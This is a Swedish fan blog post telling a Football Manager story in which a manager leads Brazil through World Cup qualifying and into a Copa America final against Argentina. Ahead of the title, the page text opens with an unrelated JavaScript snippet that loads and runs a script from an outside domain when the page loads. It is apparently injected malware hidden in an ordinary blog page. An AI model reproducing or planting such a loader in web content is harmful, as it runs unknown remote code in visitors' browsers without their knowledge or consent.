;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Off to a good start!! – FMSweden
Meny Stäng

Off to a good start!!

Efter att ha tagit över Brasilien och fått sondera den helt oändliga terrängen av brasilianska spelare, så har Devran NH Bagis tagit ut sin stomme, som kommer leda laget framåt mot VM och Copa America. 

När Bagis skulle ta ut första truppen för VM-kval, märktes det ganska snabbt att offensiva spelare fanns i ett överflöd. Hela 19 spelare som hade position ytter/off mittfältare/forward, hade ett värde på över 500 miljoner kr. Jämför det med 5 spelare på alla de andra positionerna ihop.

Stommen i det brasilianska landslag som Devran NH Bagis tog ut, var spelare som hade varit grunden i det lag som åkt ur VM precis innan turken tog över. Marcos Leonardo var lagkapten, men började komma till åren. Med sina 112 landskamper och 73 mål, var det dock givet att han skulle få göra en sista vända i landslaget och få en chans till att spela hem Copa America.

I Sydamerika kvalar man till VM och mitt i allt kommer Copa America. Det började med VM-kval.

Det startade sådär, 0-0 borta mot Paraguay, var inte vad ett krävande folk ville se. Det skulle dock bli lugn och ro redan innan året va slut.

Vinster mot Ecuador, Colombia och Chile gjorde att brassarna gick in i Copa America-året med bra självförtroende och sämre skulle det inte bli. Tre raka segrar till utan insläppt mål innan Copa America drog igång, gjorde att Brasilien tillsammans med ärkerivalen Argentina, var storfavoriter att spela final.

Brasiliens grupp bestod av Peru, Ecuador, Uruguay, Colombia och USA.

5 segrar och 18-3 i målskillnad blev facit och i kvartsfinalen skulle man ställas mot Bolivia. Det skulle väl ändå bli en enkel resa för de självförtroendefyllda brassarna?

Verkligheten blir sällan sådan.

Bolivia gjorde 0-1 i den 56:e minuten och man kunde känna stressen upp på läktaren. Turkiske veterantränaren valde att göra två byten snabbt som förändrade matchbilden direkt.

Superstjärnan Nicao gjorde 1-1 och den för Bagis bekante anfallaren Jhonata, som hade funnits under Bagis i RB Leipzig utan att gjort nåt större intryck, gjorde sedan 2-1. Brassarna höll ut och semifinalplatsen var med nöd och näppe säkrad. USA skulle stå för motståndet återigen.

Om matchen i gruppspelet var en tät match, var semifinal ett styrkebesked från Bagis mannar.

Det blev aldrig spännande, utan var mer än väntan på att Brasilien skulle göra mål.

2-0, 33-4 i avslut och 71-29 i bollinnehav. Det var en slakt.

Brasilien var i final och i den väntade som så många gånger förr antagonisten och rivalen Argentina.

Ha nu en trevlig helg vänner!!

SKÅL och Broccoli

Tobbe

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar